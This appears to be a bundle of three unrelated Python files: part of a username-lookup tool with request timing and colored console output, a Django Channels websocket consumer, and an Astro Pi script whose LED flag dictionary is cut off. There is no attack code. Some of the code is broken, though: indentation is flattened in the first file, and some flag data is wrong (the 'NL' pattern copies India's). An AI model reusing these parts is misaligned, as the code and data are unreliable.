try:
if isinstance(hooks['response'], (list, tuple)):
# needs to be first so we don't time other hooks execution
hooks['response'].insert(0, timing)
else:
hooks['response'] = [timing, hooks['response']]
except KeyError:
hooks['response'] = timing
return super(ElapsedFuturesSession, self).request(method, url, hooks=hooks, *args, **kwargs)
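# Hedged usage sketch (not part of the original module; makes a real network
# request, so it is left commented out): each response produced by this session
# carries ``elapsed`` as an integer number of milliseconds, because the timing
# hook above is inserted before any other response hooks.
# session = ElapsedFuturesSession()
# future = session.get("https://example.com")
# response = future.result()
# print(response.status_code, response.elapsed, "ms")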
def open_file(fname):
return open(fname, "a")
def write_to_file(url, f):
f.write(url + "\n")
def print_error(err, errstr, var, verbose=False):
    global error_buf
    # Lazily create the module-level buffer on first use; collected errors are
    # printed later by dump_errors().
    try:
        error_buf
    except NameError:
        error_buf = ''
error_buf += Style.BRIGHT + Fore.WHITE + "[" + \
Fore.RED + "-" + \
Fore.WHITE + "]" + \
Fore.RED + f" {errstr}" + \
Fore.YELLOW + f" {err if verbose else var}" + '\n'
def dump_errors():
global error_buf
try:
print(error_buf)
except NameError as e:
pass
def format_response_time(response_time, verbose):
return " [{} ms]".format(response_time) if verbose else ""
def print_found(social_network, url, response_time, verbose=False):
print((Style.BRIGHT + Fore.WHITE + "[" +
Fore.GREEN + "+" +
Fore.WHITE + "]" +
format_response_time(response_time, verbose) +
Fore.GREEN + " {}:").format(social_network), url)
def print_not_found(social_network, response_time, verbose=False):
print((Style.BRIGHT + Fore.WHITE + "[" +
Fore.RED + "-" +
Fore.WHITE + "]" +
format_response_time(response_time, verbose) +
Fore.GREEN + " {}:" +
Fore.YELLOW + " Not Found!").format(social_network))
def get_response(request_future, error_type, social_network, verbose=False):
try:
rsp = request_future.result()
if rsp.status_code:
return rsp, error_type, rsp.elapsed
except requests.exceptions.HTTPError as errh:
print_error(errh, "HTTP Error:", social_network, verbose)
except requests.exceptions.ConnectionError as errc:
print_error(errc, "Error Connecting:", social_network, verbose)
except requests.exceptions.Timeout as errt:
print_error(errt, "Timeout Error:", social_network, verbose)
except requests.exceptions.RequestException as err:
print_error(err, "Unknown error:", social_network, verbose)
return None, "", -1
class Loader:
def __init__(self):
self.done = False
def animate_loader(self):
for c in itertools.cycle(['|', '/', '-', '\\']):
if self.done:
break
sys.stdout.write('\rloading ' + c)
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\rDone! \n')
def start_loader(self):
global __loaders
self.thread = threading.Thread(target=Loader.animate_loader, args=(self,))
try:
            __loaders.append(self)  # track the Loader itself so stop_all() can reach .done and .thread
        except NameError:
            __loaders = [self]
self.thread.start()
return self
def stop_loader(self):
self.done = True
self.thread.join()
return self
def stop_all():
global __loaders
for loader in __loaders:
loader.done = True
loader.thread.join()
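# Hedged usage sketch (not part of the original module): wrap a slow operation
# in the console spinner; stop_all() stops every spinner started this way.
# run_slow_task below is a hypothetical placeholder for the real work.
# loader = Loader().start_loader()
# run_slow_task()
# loader.stop_loader()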
|
consumers.py
|
import json
import sys
import time
from multiprocessing import Process
from channels.generic.websocket import WebsocketConsumer
sys.path.append("..")
from Work import Work
class MyConsumer(WebsocketConsumer):
def connect(self):
self.accept()
self.uid = self.scope['url_route']['kwargs']['uid']
self.work = Work(self.uid)
    def receive(self, text_data=None, bytes_data=None):
        text_data_json = json.loads(text_data)
        message = text_data_json['message']
        received_uid = text_data_json["uid"]
        print(message, received_uid)
        if message == 'ready' and received_uid == self.uid:
            point_num = self.work.info["NXP"]
            self.send(text_data=json.dumps({
                'message': "point_num",
                'data': point_num,
                'uid': self.uid
            }))
        elif message == 'start' and received_uid == self.uid:
            main_work_process = Process(target=self.work.main_work)
            main_work_process.start()
            self.message_consumer()
            main_work_process.join()
            self.send(text_data=json.dumps({
                'message': "finished",
                'data': None,
                'uid': self.uid
            }))
        else:
            self.send(text_data=json.dumps({
                'message': "invalid message",
                'data': None,
                'uid': self.uid
            }))
    def disconnect(self, code):
        print(f"WebSocket connection ({self.uid}) closed")
    def message_consumer(self):
        # Poll the worker's queue and forward progress updates to the client
        # until the worker signals completion with -1.
        while True:
            time.sleep(0.5)
            if not self.work.q.empty():
                data = self.work.q.get()
                if data == -1:
                    return
                self.send(text_data=json.dumps({
                    'message': "calculating",
                    'data': data,
                    'uid': self.uid
                }))
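# Hedged routing sketch (not part of this file): the consumer reads ``uid`` from
# scope['url_route']['kwargs'], so the project's websocket routing must capture
# it. The URL pattern and module layout below are assumptions; on Channels 2,
# pass MyConsumer directly instead of MyConsumer.as_asgi().
# from django.urls import re_path
# websocket_urlpatterns = [
#     re_path(r"ws/work/(?P<uid>\w+)/$", MyConsumer.as_asgi()),
# ]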
|
main.py
|
import logging
import logzero
import reverse_geocoder as rg
from logzero import logger
from sense_hat import SenseHat
import datetime
import os
from time import sleep
import threading
import ephem
import pprint
import math
import io
class Astro_Pi():
"""Class for every function used in experiment (a way to order the code)"""
def __init__(self, running_time):
"""When the class obj is created create the class variables
@param1: int
"""
        R = [255, 0, 0]        # Red
        W = [255, 255, 255]    # White
        B = [0, 0, 255]        # Blue
        Y = [255, 247, 0]      # Yellow
        BL = [0, 0, 0]         # Black
        G = [0, 255, 0]        # Green
        L = [24, 166, 255]     # Light blue
        O = [255, 145, 0]      # Orange
        DG = [131, 84, 40]     # Dark Green
        GO = [153, 101, 21]    # Gold
        DB = [0, 41, 98]       # Dark Blue
        DR = [142, 4, 4]       # Dark Red
        BR = [128, 0, 0]       # Brown
        # Flags dict
self.flags={"GB":[W,B,B,R,R,B,B,W,B,W,B,R,R,B,W,B,B,B,W,R,R,W,B,B,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,B,B,W,R,R,W,B,B,B,W,B,R,R,B,W,B,W,B,B,R,R,B,B,W],"FR":[B,B,B,W,W,R,R,R,B,B,B,W,W,R,R,R,B,B,B,W,W,R,R,R,B,B,B,W,W,R,R,R,B,B,B,W,W,R,R,R,B,B,B,W,W,R,R,R,B,B,B,W,W,R,R,R,B,B,B,W,W,R,R,R],"DE":[BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,],"ES":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,Y,Y,Y,Y,Y,Y,Y,Y,Y,BL,BL,Y,Y,Y,Y,Y,Y,BL,BL,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R],"AT":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"CH":[R,R,R,W,W,R,R,R,R,R,R,W,W,R,R,R,R,R,R,W,W,R,R,R,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,R,R,R,W,W,R,R,R,R,R,R,W,W,R,R,R,R,R,R,W,W,R,R,R,],"RO":[B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,],"SK":[W,W,W,W,W,W,W,W,W,R,R,R,W,W,W,W,W,R,W,R,W,W,W,W,B,W,W,W,B,B,B,B,B,R,B,R,B,B,B,B,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"PL":[W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"BY":[W,R,R,R,R,R,R,R,R,W,R,R,R,R,R,R,W,R,R,R,R,R,R,R,R,W,R,R,R,R,R,R,W,R,R,R,R,R,R,R,R,W,G,G,G,G,G,G,W,R,G,G,G,G,G,G,R,W,G,G,G,G,G,G,],"GR":[B,W,B,W,W,W,W,W,W,W,W,B,B,B,B,B,B,W,B,W,W,W,W,W,B,B,B,B,B,B,B,B,W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,],"IT":[G,G,G,W,W,R,R,R,G,G,G,W,W,R,R,R,G,G,G,W,W,R,R,R,G,G,G,W,W,R,R,R,G,G,G,W,W,R,R,R,G,G,G,W,W,R,R,R,G,G,G,W,W,R,R,R,G,G,G,W,W,R,R,R],"HR":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,W,W,W,R,R,W,W,W,W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,],"HU":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,],"UA":[B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y],"TR":[R,R,R,R,R,R,R,R,R,R,W,W,R,R,R,R,R,W,R,R,R,W,R,R,R,W,R,R,W,W,W,R,R,W,R,R,R,W,R,R,R,R,W,W,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R],"RU":[W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R],"SA":[G,G,G,G,G,G,G,G,G,W,G,W,W,W,G,G,G,W,W,W,W,W,W,G,G,W,W,W,G,G,G,G,G,G,G,G,G,W,G,G,G,W,W,W,W,W,W,G,G,G,G,G,G,W,G,G,G,G,G,G,G,G,G,G,],"YE":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,],"IQ":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,W,G,W,W,G,G,W,W,W,W,G,W,W,W,G,W,W,W,W,W,W,W,W,W,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,],"IR":[G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,W,W,W,W,W,W,W,W,W,W,W,R,R,W,W,W,W,W,W,R,R,W,W,W,W,W,W,W,W,W,W,W,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"TM":[G,R,G,R,G,W,G,G,G,R,Y,R,G,G,W,G,G,R,R,R,G,G,W,G,G,R,G,R,G,W,G,G,G,R,Y,R,G,G,G,G,G,R,R,R,G,G,G,G,G,R,G,R,G,G,G,G,G,R,Y,R,G,G,G,G],"AF":[BL,BL,BL,R,R,G,G,G,BL,BL,BL,R,R,G,G,G,BL,BL,BL,W,W,G,G,G,BL,BL,W,W,W,W,G,G,BL,BL,W,W,W,W,G,G,BL,BL,BL,W,W,G,G,G,BL,BL,BL,R,R,G,G,G,BL,BL,BL,R,R,G,G,G,],"KZ":[L,Y,L,L,L,L,L,L,L,Y,L,L,L,L,L,L,L,Y,L,L,Y,Y,L,L,L,Y,L,Y,Y,Y,Y,L,L,Y,L,Y,Y,Y,Y,L,L,Y,L,L,Y,Y,L,L,L,Y,L,L,L,L,L,L,L,Y,L,L,L,L,L,L,],"MN":[R,R,R,B,B,R,R,R,R,Y,R,B,B,R,R,R,R,R,R,B,B,R,R,R,R,Y,R,B,B,R,R,R,R,Y,R,B,B,R,R,R,R,Y,R,B,B,R,R,R,R,Y,R,B,B,R,R,R,R,R,R,B,B,R,R,R,],"CN":[R,R,R,Y,R,R,R,R,R,Y,Y,R,Y,R,R,R,R,Y,Y,R,Y,R,R,R,R,R,R,Y
,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"MY":[B,B,Y,B,B,R,R,R,B,Y,B,Y,B,W,W,W,B,Y,B,B,B,R,R,R,B,B,Y,B,B,W,W,W,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,],"PG":[BL,R,R,R,R,R,R,R,BL,BL,R,R,Y,Y,Y,R,BL,W,BL,R,R,Y,Y,R,BL,BL,BL,BL,R,R,R,R,BL,W,W,BL,BL,R,R,R,BL,BL,BL,BL,BL,BL,R,R,BL,BL,W,BL,BL,BL,BL,R,BL,BL,BL,BL,BL,BL,BL,BL,],"AU":[B,B,R,B,B,B,B,B,B,B,R,B,B,B,W,B,R,R,R,R,R,B,B,W,B,B,R,B,B,W,B,B,B,B,R,B,B,B,B,W,B,B,B,B,B,B,W,B,B,B,W,B,B,B,B,B,B,B,B,B,B,B,B,B,],"KR":[W,W,BL,W,W,BL,W,W,W,BL,W,W,W,W,BL,W,BL,W,W,W,W,W,W,BL,W,W,W,R,R,W,W,W,W,W,W,B,B,W,W,W,BL,W,W,W,W,W,W,BL,W,BL,W,W,W,W,BL,W,W,W,BL,W,W,BL,W,W,],"JP":[W,W,W,W,W,W,W,W,W,W,W,R,R,W,W,W,W,W,R,R,R,R,W,W,W,R,R,R,R,R,R,W,W,R,R,R,R,R,R,W,W,W,R,R,R,R,W,W,W,W,W,R,R,W,W,W,W,W,W,W,W,W,W,W],"TH":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,W,W,W,W,W,W,W,W,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"ID":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,],"IN":[O,O,O,O,O,O,O,O,O,O,O,O,O,O,O,O,W,W,W,W,W,W,W,W,W,W,W,B,B,W,W,W,W,W,W,B,B,W,W,W,W,W,W,W,W,W,W,W,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,],"PK":[W,W,DG,DG,DG,DG,DG,DG,W,W,DG,DG,W,DG,DG,DG,W,W,DG,W,DG,DG,W,DG,W,W,DG,W,DG,DG,DG,DG,W,W,DG,W,DG,DG,W,DG,W,W,DG,DG,W,W,DG,DG,W,W,DG,DG,DG,DG,DG,DG,W,W,DG,DG,DG,DG,DG,DG,],"NA":[B,B,B,B,B,W,R,R,B,Y,B,B,W,R,R,W,B,B,B,W,R,R,W,G,B,B,W,R,R,W,G,G,B,W,R,R,W,G,G,G,W,R,R,W,G,G,G,G,R,R,W,G,G,G,G,G,R,W,G,G,G,G,G,G,],"AO":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,Y,Y,R,R,R,R,R,R,R,R,Y,R,R,R,BL,BL,BL,Y,Y,BL,BL,BL,BL,BL,Y,Y,Y,BL,BL,BL,BL,BL,BL,BL,BL,Y,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,],"CD":[B,B,B,B,B,Y,R,R,B,Y,B,B,Y,R,R,Y,B,B,B,Y,R,R,Y,B,B,B,Y,R,R,Y,B,B,B,Y,R,R,Y,B,B,B,Y,R,R,Y,B,B,B,B,R,R,Y,B,B,B,B,B,R,Y,B,B,B,B,B,B,],"SS":[B,BL,BL,BL,BL,BL,BL,BL,B,B,BL,BL,BL,BL,BL,BL,B,B,B,W,W,W,W,W,B,Y,Y,B,R,R,R,R,B,Y,Y,B,R,R,R,R,B,B,B,W,W,W,W,W,B,B,G,G,G,G,G,G,B,G,G,G,G,G,G,G,],"SD":[G,R,R,R,R,R,R,R,G,G,R,R,R,R,R,R,G,G,G,R,R,R,R,R,G,G,G,G,W,W,W,W,G,G,G,G,W,W,W,W,G,G,G,BL,BL,BL,BL,BL,G,G,BL,BL,BL,BL,BL,BL,G,BL,BL,BL,BL,BL,BL,BL,],"GN":[R,R,R,Y,Y,G,G,G,R,R,R,Y,Y,G,G,G,R,R,R,Y,Y,G,G,G,R,R,R,Y,Y,G,G,G,R,R,R,Y,Y,G,G,G,R,R,R,Y,Y,G,G,G,R,R,R,Y,Y,G,G,G,R,R,R,Y,Y,G,G,G,],"ZA":[G,G,W,R,R,R,R,R,Y,G,G,W,R,R,R,R,BL,Y,G,G,W,W,W,W,BL,BL,Y,G,G,G,G,G,BL,BL,Y,G,G,G,G,G,BL,Y,G,G,W,W,W,W,Y,G,G,W,B,B,B,B,G,G,W,B,B,B,B,B,],"ET":[G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,B,B,G,G,G,Y,Y,B,Y,Y,B,Y,Y,Y,Y,B,Y,Y,B,Y,Y,R,R,R,B,B,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"NG":[G,G,G,W,W,G,G,G,G,G,G,W,W,G,G,G,G,G,G,W,W,G,G,G,G,G,G,W,W,G,G,G,G,G,G,W,W,G,G,G,G,G,G,W,W,G,G,G,G,G,G,W,W,G,G,G,G,G,G,W,W,G,G,G,],"NL":[O,O,O,O,O,O,O,O,O,O,O,O,O,O,O,O,W,W,W,W,W,W,W,W,W,W,W,O,O,W,W,W,W,W,W,O,O,W,W,W,W,W,W,W,W,W,W,W,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,],"TD":[B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,],"LY":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,BL,BL,W,W,BL,BL,BL,BL,BL,W,BL,BL,BL,W,W,BL,BL,W,BL,BL,BL,W,W,BL,BL,BL,W,W,BL,BL,BL,BL,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,],"ML":[G,G,G,Y,Y,R,R,R,G,G,G,Y,Y,R,R,R,G,G,G,Y,Y,R,R,R,G,G,G,Y,Y,R,R,R,G,G,G,Y,Y,R,R,R,G,G,G,Y,Y,R,R,R,G,G,G,Y,Y,R,R,R,G,G,G,Y,Y,R,R,R,],"MR":[R,R,R,R,R,R,R,R,G,G,G,Y,Y,G,G,G,G,G,G,G,G,G,G,G,G,G,Y,G,G,Y,G,G,G,G,Y,G,G,Y,G,G,G,G,G,Y,Y,G,G,G,G,G,G,G,G,G,G,G,R,R,R,R,R,R,R,R,],"DZ":[G,G,G,G,W,W,W,W,G,G,G,G,W,W,W,W,G,G,G,R,R,W,W,W,G,G,R,G,W,W,R,W,G,G,R,G,W,W,R,W,G,G,G,R,R,W,W,W,G,G,G,G,W,W,W,W,G,G,G,G,W,W,W,W,],"EG":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,W,W,W,
W,W,W,W,W,W,Y,Y,W,W,W,W,W,W,Y,Y,W,W,W,W,W,W,W,W,W,W,W,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,],"US":[W,B,W,B,W,R,R,R,B,W,B,W,B,W,W,W,W,B,W,B,W,R,R,R,B,W,B,W,B,W,W,W,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,],"CA":[R,W,W,W,W,W,W,R,R,W,W,W,W,W,W,R,R,W,W,R,R,W,W,R,R,W,R,R,R,R,W,R,R,W,W,R,R,W,W,R,R,W,W,R,R,W,W,R,R,W,W,W,W,W,W,R,R,W,W,W,W,W,W,R,],"BR":[G,G,G,Y,Y,G,G,G,G,G,Y,B,B,Y,G,G,G,Y,B,B,B,B,Y,G,Y,B,B,B,B,B,B,Y,Y,B,B,B,B,B,B,Y,G,Y,B,B,B,B,Y,G,G,G,Y,B,B,Y,G,G,G,G,G,Y,Y,G,G,G,],"BO":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,],"VE":[Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,B,B,W,W,W,W,B,B,B,W,B,B,B,B,W,B,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"AR":[B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,W,W,W,W,W,W,W,W,W,W,W,Y,Y,W,W,W,W,W,W,Y,Y,W,W,W,W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,],"UY":[W,Y,W,B,B,B,B,B,Y,Y,Y,W,W,W,W,W,W,Y,W,B,B,B,B,B,W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,W,W,W,W,W,W,W,W,],"UZ":[L,L,W,L,L,W,L,W,L,W,L,L,W,L,W,L,L,L,W,L,L,L,L,L,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,],"VN":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,Y,Y,R,R,R,R,R,Y,Y,Y,Y,R,R,R,R,R,Y,Y,R,R,R,R,R,Y,R,R,Y,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"ZM":[DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,O,DG,O,DG,DG,DG,DG,DG,DG,O,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,R,BL,O,DG,DG,DG,DG,DG,R,BL,O,DG,DG,DG,DG,DG,R,BL,O,DG,DG,DG,DG,DG,R,BL,O,],"ZW":[W,G,G,G,G,G,G,G,W,W,Y,Y,Y,Y,Y,Y,W,W,W,R,R,R,R,R,W,Y,W,W,BL,BL,BL,BL,W,Y,W,W,BL,BL,BL,BL,W,W,W,R,R,R,R,R,W,W,Y,Y,Y,Y,Y,Y,W,G,G,G,G,G,G,G,],"CU":[R,B,B,B,B,B,B,B,R,R,W,W,W,W,W,W,R,R,R,W,W,W,W,W,R,W,R,R,B,B,B,B,R,W,R,R,B,B,B,B,R,R,R,W,W,W,W,W,R,R,W,W,W,W,W,W,R,B,B,B,B,B,B,B,],"CZ":[B,W,W,W,W,W,W,W,B,B,W,W,W,W,W,W,B,B,B,W,W,W,W,W,B,B,B,B,W,W,W,W,B,B,B,B,R,R,R,R,B,B,B,R,R,R,R,R,B,B,R,R,R,R,R,R,B,R,R,R,R,R,R,R,],"KP":[B,B,B,B,B,B,B,B,W,W,W,W,W,W,W,W,R,R,W,W,R,R,R,R,R,W,R,R,W,R,R,R,R,W,R,R,W,R,R,R,R,R,W,W,R,R,R,R,W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,],"PT":[G,G,G,R,R,R,R,R,G,G,G,R,R,R,R,R,G,G,Y,Y,R,R,R,R,G,Y,W,W,Y,R,R,R,G,Y,W,W,Y,R,R,R,G,G,Y,Y,R,R,R,R,G,G,G,R,R,R,R,R,G,G,G,R,R,R,R,R,],"PY":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,W,W,G,Y,Y,G,W,W,W,W,G,Y,Y,G,W,W,W,W,W,G,G,W,W,W,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,],"RS":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,Y,Y,Y,R,R,R,B,R,O,W,O,R,B,B,B,R,W,W,W,R,B,B,W,W,R,W,R,W,W,W,W,W,W,R,W,W,W,W,W,W,W,W,W,W,W,W,],"SE":[B,B,Y,Y,B,B,B,B,B,B,Y,Y,B,B,B,B,B,B,Y,Y,B,B,B,B,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,B,B,Y,Y,B,B,B,B,B,B,Y,Y,B,B,B,B,B,B,Y,Y,B,B,B,B,],"SL":[G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,],"SN":[DG,DG,Y,Y,Y,Y,R,R,DG,DG,Y,Y,Y,Y,R,R,DG,DG,Y,Y,Y,Y,R,R,DG,DG,Y,DG,DG,Y,R,R,DG,DG,Y,DG,DG,Y,R,R,DG,DG,Y,Y,Y,Y,R,R,DG,DG,Y,Y,Y,Y,R,R,DG,DG,Y,Y,Y,Y,R,R,],"SO":[L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,W,W,L,L,L,L,L,W,W,W,W,L,L,L,L,L,W,W,L,L,L,L,L,W,L,L,W,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,],"SR":[G,G,G,G,G,G,G,G,W,W,W,W,W,W,W,W,R,R,R,R,R,R,R,R,R,R,R,Y,Y,R,R,R,R,R,R,Y,Y,R,R,R,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,G,G,G,G,G,G,G,G,],"SY":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,W,DG,DG,W,W,DG,DG,W,W,DG,DG,W,W,DG,DG,W,W,W,W,W,W,W,W,W,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,],"MM":[Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,W,W,Y,Y,Y,Y,Y,W,W,W,W,Y,Y,G,G,G,W,W,G,G,G,G,G,G,W,W,G,G,G,R,R,W,R,R,W,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"NI":[B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,W,W,W,W,W,W,W,W,W,W,W,Y,Y,W,W,W,W,W,Y,Y,Y,Y,
W,W,W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,],"NE":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,],"MX":[DG,DG,W,W,W,W,DG,DG,DG,DG,W,W,W,W,DG,DG,DG,DG,W,BR,W,BR,DG,DG,DG,DG,W,W,BR,W,DG,DG,DG,DG,W,W,BR,BR,DG,DG,DG,DG,W,W,O,W,DG,DG,DG,DG,W,W,W,W,DG,DG,DG,DG,W,W,W,W,DG,DG,],"MZ":[DR,DG,DG,DG,DG,DG,DG,DG,DR,DR,DG,DG,DG,DG,DG,DG,DR,DR,DR,W,W,W,W,W,DR,Y,Y,DR,BL,BL,BL,BL,DR,Y,Y,DR,BL,BL,BL,BL,DR,DR,DR,W,W,W,W,W,DR,DR,DG,DG,DG,DG,DG,DG,DR,DG,DG,DG,DG,DG,DG,DG,],"AD":[B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,GO,GO,R,R,R,B,B,B,GO,GO,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,],"AE":[R,R,G,DG,DG,DG,DG,DG,R,R,DG,DG,DG,DG,DG,DG,R,R,DG,DG,DG,DG,DG,DG,R,R,W,W,W,W,W,W,R,R,W,W,W,W,W,W,R,R,BL,BL,BL,BL,BL,BL,R,R,BL,BL,BL,BL,BL,BL,R,R,BL,BL,BL,BL,BL,BL,],"AL":[R,R,R,R,R,R,R,R,R,R,BL,R,R,BL,R,R,R,BL,R,BL,BL,R,BL,R,R,R,BL,BL,BL,BL,R,R,R,R,R,BL,BL,R,R,R,R,R,BL,BL,BL,BL,R,R,R,R,R,BL,BL,R,R,R,R,R,R,R,R,R,R,R,],"AM":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,],"AZ":[L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,R,R,W,W,R,R,R,R,R,W,R,R,R,W,W,R,R,W,R,R,R,W,W,R,R,R,W,W,R,R,R,R,G,G,G,G